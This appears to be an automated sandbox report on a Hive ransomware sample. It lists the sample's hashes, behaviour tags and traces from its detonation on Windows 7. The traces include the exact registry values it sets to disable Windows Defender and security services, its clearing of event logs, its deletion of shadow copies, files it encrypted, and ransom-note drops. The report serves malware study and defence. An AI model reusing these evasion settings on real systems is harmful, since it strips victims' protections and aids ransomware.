Malware Analysis Report

2025-01-22 20:46

Sample ID 241205-e4ppaavmck
Target c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118
SHA256 36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e
Tags
hive defense_evasion evasion execution impact ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e

Threat Level: Known bad

The file c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

hive defense_evasion evasion execution impact ransomware spyware stealer trojan

Hive family

Hive

Disables service(s)

Modifies security service

Modifies Windows Defender Real-time Protection settings

Deletes Windows Defender Definitions

Modifies boot configuration data using bcdedit

Deletes shadow copies

Clears Windows event logs

Reads user/profile data of web browsers

Command and Scripting Interpreter: PowerShell

Modifies Security services

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Uses Task Scheduler COM API

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-05 04:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-05 04:29

Reported

2024-12-05 04:32

Platform

win7-20240903-en

Max time kernel

146s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Disables service(s)

evasion execution

Hive

ransomware hive

Hive family

hive

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Security services

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SecurityHealthService\Start = "4" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_down.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_06pWK_7vRn40.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_NYNQGU972ks0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIcon.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR29B.GIF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_AnaDkGyNoQI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\TURABIAN.XSL.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_-lmEUtl18Pg0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\QUERIES\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_JmW0ptIC3DA0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00388_.WMF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_kF_PGT0NkFM0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR4B.GIF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_FYkfJMeOQDY0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_YOSay9cXXJo0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Waveform.thmx.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_c19VodEBFJA0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105710.WMF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_yTwj6CZt12E0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14710_.GIF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_Mn6HHrUWR0Y0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr__dl13-2YKoM0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\Servers\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\settings.html C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\SETUP.XML.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_WI249ly2flw0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\ReviewRouting_Init.xsn.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_hxglD541V4U0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\Components\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.config.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_t0Yz5iqFrD80.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_eDcGJDJA9w40.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\NETWORK\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Melbourne.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_57WTzY3lD840.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\ARCTIC.INF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_9EypZa7Wb480.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_FDBZPArKk7Y0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Windows Media Player\en-US\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_VelvetRose.gif.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_-ZbQRQZ-NYM0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\IpsMigrationPlugin.dll.mui C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_I-gYfAqxAxk0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\security\javaws.policy.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_Pn_2lIzdP6A0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_fFCz9J0Hop80.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00118_.WMF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_HvR3IJnTwEs0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_1ywZ0fCor1g0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14828_.GIF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_kuZMR8y3AUs0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_-TRz0eUHHxA0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\WordMUI.XML.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_-lABe8TtqMI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_96hJsAsk_UM0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_up.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\phLK_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_h1yDnXoIjxQ0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_D6YRYNUInsk0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_2gD-UFhE5Tc0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_ncAKNDkfcBQ0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01015_.WMF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_rhdh7o2KHPY0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_dAWD4nQqxqI0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_Z3I1fpxr0zc0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\css\picturePuzzle.css C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BrightOrange\tab_off.gif.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_VC2R6aiWSAQ0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_Yt-Zy2M9KeY0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01140_.WMF.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_WZDDpQagL3o0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg.53yOJ6Wdb4HKRzyT-WxDHgoGLidU63Es7wXb_DGacWr_7xfZo7e6ycQ0.vck99 C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
